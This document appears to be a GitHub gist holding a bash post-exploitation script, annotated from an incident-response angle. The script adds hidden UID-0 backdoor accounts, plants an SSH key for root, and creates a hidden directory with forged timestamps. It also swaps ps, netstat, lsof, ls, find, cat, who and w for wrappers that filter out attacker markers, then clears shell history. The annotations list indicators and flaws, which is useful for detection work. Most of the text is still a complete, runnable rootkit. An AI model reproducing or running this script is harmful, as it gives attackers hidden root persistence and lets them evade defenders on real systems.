@sbehrens
Last active April 3, 2022 02:23
# TODO
# copy binarys to new location, execute from said location. ensure ps command filters out commands
#PORT="1337"
# Add users, cat ssh key for ssh key access, clear history, copy shells with sguid bit set to hidden files for later use
#
# NOTE(review): reviewer annotations below are written from an incident-response angle: what each
# step changes on the host and which artifact it leaves. The script must run as root (it rewrites
# /etc/passwd and /etc/shadow and writes under /usr/lib and /root). The "copy shells with sguid bit"
# item in the TODO above is not implemented in this version -- no setuid copy appears anywhere below.
#
# Persistence, accounts: drop any existing 'news'/'list' users, then re-create both as UID 0 / GID 0
# (the ':x:0:0:' fields). Extra UID-0 records in /etc/passwd are the first thing to look for.
deluser news > /dev/null 2>&1
deluser list > /dev/null 2>&1
# '7i' inserts the record before line 7 of /etc/passwd. The result goes through /tmp/out.txt and is
# copied back with 'cat >' (overwriting /etc/passwd in place rather than replacing the file), so the
# file's inode and ownership are unchanged -- only its mtime/ctime move.
sed '7ilist:x:0:0:list,,,,:/:/bin/bash' /etc/passwd > /tmp/out.txt && cat /tmp/out.txt > /etc/passwd && rm /tmp/out.txt
# Matching /etc/shadow record. Both backdoor accounts get the same fixed $6$ (SHA-512 crypt) hash,
# so that hash string is a usable indicator when sweeping other hosts.
sed '7ilist:$6$Pgr2zg2C$dXr7E7txxsnqGvGYOqYxF5KwkLjQx70gFjuoXIi2PclRxDlm4.jDAvJRhu7OHPG3rRblV29XuQ6mBRcUog1MW0:15401:0:99999:7:::' /etc/shadow > /tmp/out.txt && cat /tmp/out.txt > /etc/passwd && rm /tmp/out.txt
sed '8inews:x:0:0:list,,,,:/:/bin/bash' /etc/passwd > /tmp/out.txt && cat /tmp/out.txt > /etc/passwd && rm /tmp/out.txt
sed '8inews:$6$Pgr2zg2C$dXr7E7txxsnqGvGYOqYxF5KwkLjQx70gFjuoXIi2PclRxDlm4.jDAvJRhu7OHPG3rRblV29XuQ6mBRcUog1MW0:15401:0:99999:7:::' /etc/shadow > /tmp/out.txt && cat /tmp/out.txt > /etc/shadow && rm /tmp/out.txt
# Persistence, SSH: appends a hard-coded ssh-dss public key (comment 'root@bt') to
# /root/.ssh/authorized_keys. Note the leading space inside the echo string -- the appended line
# starts with a blank. Audit root's authorized_keys for this key (and for ssh-dss keys generally).
mkdir /root/.ssh > /dev/null 2>&1; echo " ssh-dss AAAAB3NzaC1kc3MAAACBANux0TRi7X4Jet/Y/9Nyo517a1YskOqr4iBKEmDXf9qvKLUvdsEfBuJ4uAa3IEcCuE+9Rs/TtJYJOmpD9uCV9lNo/ZNZqCZDr2ERDcusM3L7T0ZwyZewQvixsJ9VZRffYOv8vtaT9Xu9Y+ILXNZDOx39evoqGqsPGb7w3zboHcjNAAAAFQDEn+/NLtr2oPNUlLnt/0kwH+w0UQAAAIBKTkDXiuBHGM7vKYXraFdcVgl/XYuHnChypzAVEqwNHBRbGUg4OHr29j7ncIYK2Y7zvO4KdrJ/uohm1cGSHsmXESiNjPnhFJHo6tIaNlpTk/YzTiPmJk8Wc/hdjdCamBF++3NsixMo7OfqDqXS461QpXKDdTa/rqi0fHsgLIcDKgAAAIBSzxtMPcoF3k+UQmtwIlUQt8tDt0OaCxoO8A+R7GW1rbqPDJXbHHWZVsf/7IS1WRvrajISiVPEPxIAPZVAv1HFTrMseKoMF1xYaS27q6ld1cIBK4CXPW2zzgnpDgqpCVkQEsfSfISgQ6EbU3dff/ipGOGvEFBT5doh8dZRqA+Bng== root@bt" >>/root/.ssh/authorized_keys
# create " " dir used for holding actual binarys and other thigns if needed
#
# Hiding place: a directory under /usr/lib whose name is a single space character. In a directory
# listing it shows up as a blank entry. To find it, use a tool this script does not wrap (find, ls
# and cat are all replaced further down), e.g. package-manager verification or a known-good binary.
#
# Timestomping: field 6 of 'ls -ld /bin/cat' (presumably the date column -- its exact content
# depends on the ls format and locale) is fed to 'touch -d' so the new directory appears as old as
# /bin/cat. touch only sets atime/mtime; the ctime still records when this script actually ran.
# The '2>./log.error' redirection also creates log.error in the current working directory.
dirstamp="`ls -ld /bin/cat | awk {'print $6'} 2>./log.error`"
echo $dirstamp
mkdir /usr/lib/" "
touch -d $dirstamp /usr/lib/" "
# copy grep over for all other pwnage
#
# The wrappers below call this private copy of grep by absolute path, so they do not depend on
# PATH. /bin/grep itself is left unmodified -- a plain 'grep' over /etc/passwd still shows the
# backdoor accounts, unlike the wrapped cat.
cp /bin/grep /usr/lib/" "/
# create error log file for testing
touch log.error
# lsof ownage
#
# Pattern used for every wrapped tool from here on:
#   1. record field 6 of the original binary's 'ls -l' line (for touch -d later);
#   2. create an empty, mode-755 staging file in the current directory;
#   3. 'read -d ""' slurps the quoted here-doc into a variable ("BLOCK" is quoted, so $@ stays
#      literal in the wrapper text; read returns non-zero at end of input, which is harmless here
#      because set -e is never enabled);
#   4. write that text out as the wrapper, move the real binary into the hidden directory and the
#      wrapper into its place, then back-date the wrapper's mtime.
# The wrapper is a three-line bash script, not an ELF: 'file' on the replaced path, or a package
# checksum verification, identifies it immediately. Its filter drops any output line containing
# '1337', 'bad_shell2' or 'bad_shell3' -- presumably markers carried by the attacker's own processes
# and files (cf. the commented-out PORT="1337" above), so those strings are also indicators.
lsofstamp="`ls -l /usr/bin/lsof 2>log.error | awk {'print $6'}`"
echo $lsofstamp
touch ./lsof
chmod 755 ./lsof
read -d '' lsof <<"BLOCK"
#!/bin/bash
/usr/lib/" "/lsof $@ | /usr/lib/" "/grep -v '1337' | /usr/lib/" "/grep -v 'bad_shell2' | /usr/lib/" "/grep -v 'bad_shell3'
BLOCK
echo "$lsof" > lsof
mv /usr/bin/lsof /usr/lib/" "/
mv ./lsof /usr/bin/
touch -d $lsofstamp /usr/bin/lsof
# Netstat ownage
# Same pattern; hides connections whose netstat line contains the marker strings.
netstatstamp="`ls -l /bin/netstat 2>log.error | awk {'print $6'}`"
echo $netstatstamp
touch ./netstat
chmod 755 ./netstat
read -d '' netstat <<"BLOCK"
#!/bin/bash
/usr/lib/" "/netstat $@ | /usr/lib/" "/grep -v '1337' | /usr/lib/" "/grep -v 'bad_shell2' | /usr/lib/" "/grep -v 'bad_shell3'
BLOCK
echo "$netstat" > netstat
mv /bin/netstat /usr/lib/" "/
mv ./netstat /bin/
touch -d $netstatstamp /bin/netstat
# ps command hack
# Same pattern; hides processes whose ps line contains the marker strings. Reading /proc directly
# (or any process tool other than ps, e.g. pgrep/top) is unaffected.
psstamp="`ls -l /bin/ps 2>log.error | awk {'print $6'}`"
echo $psstamp
touch ./ps
chmod 755 ./ps
read -d '' ps <<"BLOCK"
#!/bin/bash
/usr/lib/" "/ps $@ | /usr/lib/" "/grep -v '1337' | /usr/lib/" "/grep -v 'bad_shell2' | /usr/lib/" "/grep -v 'bad_shell3'
BLOCK
echo "$ps" > ps
mv /bin/ps /usr/lib/" "/
mv ./ps /bin/
touch -d $psstamp /bin/ps
# who command hack
# Same pattern for who (login sessions).
whostamp="`ls -l /usr/bin/who 2>log.error | awk {'print $6'}`"
echo $whostamp
touch ./who
chmod 755 ./who
read -d '' who <<"BLOCK"
#!/bin/bash
/usr/lib/" "/who $@ | /usr/lib/" "/grep -v '1337' | /usr/lib/" "/grep -v 'bad_shell2' | /usr/lib/" "/grep -v 'bad_shell3'
BLOCK
echo "$who" > who
mv /usr/bin/who /usr/lib/" "/
mv ./who /usr/bin/
touch -d $whostamp /usr/bin/who
# w command hack
# Same pattern for w; the staging variable is named 'ww' but the file written is still ./w.
wstamp="`ls -l /usr/bin/w 2>log.error | awk {'print $6'}`"
echo $wstamp
touch ./w
chmod 755 ./w
read -d '' ww <<"BLOCK"
#!/bin/bash
/usr/lib/" "/w $@ | /usr/lib/" "/grep -v '1337' | /usr/lib/" "/grep -v 'bad_shell2' | /usr/lib/" "/grep -v 'bad_shell3'
BLOCK
echo "$ww" > w
mv /usr/bin/w /usr/lib/" "/
mv ./w /usr/bin/
touch -d $wstamp /usr/bin/w
# find hack
# Same pattern for find; paths containing the marker strings are dropped from find output.
findstamp="`ls -l /usr/bin/find 2>log.error | awk {'print $6'}`"
echo $findstamp
touch ./find
chmod 755 ./find
read -d '' find <<"BLOCK"
#!/bin/bash
/usr/lib/" "/find $@ | /usr/lib/" "/grep -v '1337' | /usr/lib/" "/grep -v 'bad_shell2' | /usr/lib/" "/grep -v 'bad_shell3'
BLOCK
echo "$find" > find
mv /usr/bin/find /usr/lib/" "/
mv ./find /usr/bin/
touch -d $findstamp /usr/bin/find
# tcpdump hack
# NOTE(review): the comment above says tcpdump, but this section wraps /bin/ls (tcpdump is never
# touched). Because the wrapper pipes ls through grep, ls always behaves as if its output were not
# a terminal (single-column, uncoloured) -- a visible change users may notice.
lsstamp="`ls -l /bin/ls 2>log.error | awk {'print $6'}`"
echo $lsstamp
touch ./ls
chmod 755 ./ls
read -d '' ls <<"BLOCK"
#!/bin/bash
/usr/lib/" "/ls $@ | /usr/lib/" "/grep -v '1337' | /usr/lib/" "/grep -v 'bad_shell2' | /usr/lib/" "/grep -v 'bad_shell3'
BLOCK
echo "$ls" > ls
mv /bin/ls /usr/lib/" "/
mv ./ls /bin/
touch -d $lsstamp /bin/ls
# Remove stuff
#
# Strips the ls/ll/la/l alias lines from root's ~/.bashrc (presumably so the aliases do not
# interfere with the wrapped ls). NOTE(review): the shell opens '> ~/.bashrc' (truncating it)
# before cat reads it, so in practice this leaves ~/.bashrc empty -- an easily spotted artifact.
# /bin/cat is still the genuine binary at this point; it is replaced in the next section.
cat ~/.bashrc | /usr/lib/" "/grep -v "alias ls" | /usr/lib/" "/grep -v "alias ll" | /usr/lib/" "/grep -v "alias la" | /usr/lib/" "/grep -v "alias l=" > ~/.bashrc
#cat ownage
#
# The cat wrapper filters differently from the others: it drops lines containing 'list' or 'news'
# (plus 'bad_shell3'), so 'cat /etc/passwd' / 'cat /etc/shadow' hide the two backdoor accounts.
# It also silently drops those substrings from every other file cat is used on. getent, grep, awk,
# less or any editor still show the real file contents.
catstamp="`ls -l /bin/cat 2>log.error | awk {'print $6'}`"
echo $catstamp
touch ./cat
chmod 755 ./cat
read -d '' cat <<"BLOCK"
#!/bin/bash
/usr/lib/" "/cat $@ | /usr/lib/" "/grep -v 'list' | /usr/lib/" "/grep -v 'news' | /usr/lib/" "/grep -v 'bad_shell3'
BLOCK
echo "$cat" > cat
mv /bin/cat /usr/lib/" "/
mv ./cat /bin/
touch -d $catstamp /bin/cat
# clear out history
#
# Anti-forensics for the current shell only: clears in-memory history, stops it being written on
# exit, and deletes the history file. Command auditing that happens outside the shell (auditd,
# process accounting, remote syslog, EDR) is unaffected. Also note what is NOT cleaned up here:
# log.error in the working directory, and the ctimes on every file this script touched.
history -c
unset HISTFILE
rm -rf ~/.bash_history > /dev/null 2>&1